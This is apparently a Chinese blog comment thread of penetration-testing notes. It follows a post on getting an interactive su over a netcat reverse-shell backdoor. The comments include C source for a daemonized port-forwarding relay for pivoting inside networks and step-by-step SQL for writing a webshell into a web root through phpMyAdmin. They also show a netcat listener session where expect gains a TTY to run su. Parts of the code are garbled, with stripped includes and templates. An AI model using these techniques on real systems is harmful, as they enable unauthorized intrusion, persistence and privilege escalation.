评论: 用nst的反弹后后门连上nc后不能su交互的解决方法+内网渗透测试笔记

4,ie没sock5设置。我都是用firefox的。

Posted by hello at May 7, 2009 01:16 AM

老点的ie版本有这个选项,新版的中文ie的话就是“套接字”那项;另opera里面没有这个

Posted by vitter at May 7, 2009 01:19 PM

sockscap,呵呵
linux下用proxy-chain

Posted by xi4oyu at June 7, 2009 05:02 PM

读取配置文件/etc/portmap.conf,代码如下:

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

typedef struct desc_addr
{
int port;
char ip[32];
} DESC_ADDR;

void* work( void *p )
{
char buffer[8192];
int *spair = (int *)p;
size_t len;
while ( (len = recv(spair[0], buffer, 8192, 0)) > 0 )
{
if ( send( spair[1], buffer, len, 0 ) map_s2p;
std::map map_p2s;
std::map port_map;
int max_sock;

void mybind(int port)
{
struct sockaddr_in svr_addr;
svr_addr.sin_family = AF_INET;
svr_addr.sin_port = htons(port);
svr_addr.sin_addr.s_addr = INADDR_ANY;
int svr_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
int optval = 1;
setsockopt( svr_sock, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
bind ( svr_sock, (struct sockaddr *)&svr_addr, sizeof(svr_addr) );
listen( svr_sock, 5 );
map_p2s.insert( std::make_pair(port, svr_sock) );
map_s2p.insert( std::make_pair(svr_sock, port) );
max_sock = std::max(max_sock, svr_sock);
}

void doit(int svr_sock)
{
int s = accept ( svr_sock, 0, 0 );
if( -1 == s )
return;

char ipbuffer[32];
int port = map_s2p[svr_sock];
DESC_ADDR addr = port_map[port];

strcpy(ipbuffer, addr.ip);

struct sockaddr_in peer;
socklen_t peer_len = sizeof(peer);
if( 0 != getpeername(s, (struct sockaddr *)&peer, &peer_len) )
return;
syslog( LOG_INFO, "doit src=%s, dest=%s", inet_ntoa(peer.sin_addr), ipbuffer );

if ( fork() == 0 )
{
struct sockaddr_in cli_addr;
cli_addr.sin_family = AF_INET;
cli_addr.sin_addr.s_addr = inet_addr(ipbuffer);
cli_addr.sin_port = htons(addr.port);
int cli_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
connect (cli_sock, (struct sockaddr *)&cli_addr, sizeof(cli_addr) );

int spair0[2], spair1[2];
spair1[1] = spair0[0] = s;
spair1[0] = spair0[1] = cli_sock;
pthread_t t1;
pthread_create ( &t1, NULL, work, spair0 );
work(spair1);
}
else
close(s);
}

void readconf(void)
{
char line[1024] = {};
FILE *fp;

if ((fp = fopen("/etc/portmap.conf", "r")) == NULL)
return;

while(fgets(line, 1024, fp) != NULL)
{
char *s = line;
while(isspace(*s))
++s;
char * pos = strrchr(line, '#');
if (pos)
*pos = '\0';
if (strlen(s))
{
int local_port = 0;
int desc_port = 0;
char ipbuf[32] = {};
sscanf(s, "%d%s%d", &local_port, ipbuf, &desc_port);
DESC_ADDR addr;
addr.port = desc_port;
strncpy(addr.ip, ipbuf, 32);
port_map.insert( std::make_pair(local_port, addr) );
mybind(local_port);
}
}
}

int main(int argc, char **argv)
{
daemon(0, 0);
signal( SIGCHLD, SIG_IGN);

int port;
int s;
readconf();

while (1 )
{
fd_set rfds;
struct timeval tv;
int retval;
FD_ZERO(&rfds);
for (std::map::iterator iter = port_map.begin(); iter != port_map.end(); iter++)
FD_SET(map_p2s[iter->first], &rfds);

tv.tv_sec = 30;
tv.tv_usec = 0;
retval = select(max_sock+1, &rfds, NULL, NULL, &tv);

if (retval == -1)
{
syslog( LOG_ERR, "select retval = -1" );
}
else if (retval)
{
for( s=0; s<=max_sock; s++) if( FD_ISSET(s,&rfds) ) doit(s);
}

}
}

Posted by vitter at June 8, 2009 02:57 PM

phpmyadmin的写webshell
1.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
2.选择一个Database.运行以下语句.
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('');
select cmd from a into outfile '/usr/local/Apache2/htdocs/phpMyAdmin/test.php';
Drop TABLE IF EXISTS a;

Posted by vitter at September 1, 2009 10:10 AM

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password: mypassword
localhost ~ #
用Expect也可以得到tty。

Posted by vitter at December 29, 2010 10:29 AM
发表评论













记住个人信息?